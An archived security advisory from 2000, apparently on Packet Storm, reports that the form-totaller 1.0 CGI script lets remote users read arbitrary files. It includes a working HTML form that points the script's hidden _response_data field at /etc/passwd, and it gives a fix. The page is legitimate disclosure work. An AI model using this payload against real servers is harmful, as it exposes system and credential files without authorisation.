exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

form-totaller.txt

form-totaller.txt
Posted Aug 14, 2000
Authored by Signal 9

Form-Totaller version 1.0 (form-totaller.cgi) trusts user input for filenames, allowing a remote user to read any file on the webserver.

tags | exploit, remote, cgi
SHA-256 | e3d777d52f8cfacde87ec258a2d6cfa48ba8b637c56c21835cdf716ee4620394

form-totaller.txt

Change Mirror Download
Content-Type: Remote Root via vulnerible CGI software
Date : 13/08/2000
Sender : s1gnal_9 <s1gnal-9@vs-solutions.com>
Subject : form-totaller Vulnerible CGI
X-System : UNIX/NT systems running the form-totaller CGI software
X-Status : s1gnal_9-ADVISORY-form-totaller.txt
X-Greets : Narr0w, f0bic, VetesGirl
_________________________________________________________________________________


PRODUCT NAME: form-totaller version 1.0

PRODUCT HOMEPAGE: http://www.newbreedsoftware.com/form-totaller/
Also Available at freecode.com

DESCRIPTION :
Use "form-totaller" to create tests and quizes on the web.
Use forms with pull-down menus or radio buttons and this CGI will display
output based on their input.

PROBLEM:
The command field "_response_data" is the field that specifies the display output
based on their input.

The default file for this field is set at:
<input type="hidden" name="_response_data" value="responses.dat">
A remote attacker could easily change the cgi script to use "/etc/passwd" as the
response data value.


EXAMPLE:
Below is a example of how we could read files on the remote system.

<-------------------------CUT HERE-------------------------------------->
<form action="http://www.SOMESERVER.com/form-totaller/form-totaller.cgi" method="post">
<input type="hidden" name="_response_top" value="top.html">
<input type="hidden" name="_response_data" value="/etc/passwd">
<input type="hidden" name="_response_bottom" value="bottom.html">
<input type="hidden" name="_divide_by" value="4">
<input type="submit" value="Click for viewing of the /etc/passwd file.">
</form>
<-------------------------CUT HERE-------------------------------------->


SOLUTION
I would recommend hard-coding the response_data file right into the script
and leave that command field out of the cgi.


Please visit www.zone.ee/unix :)

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close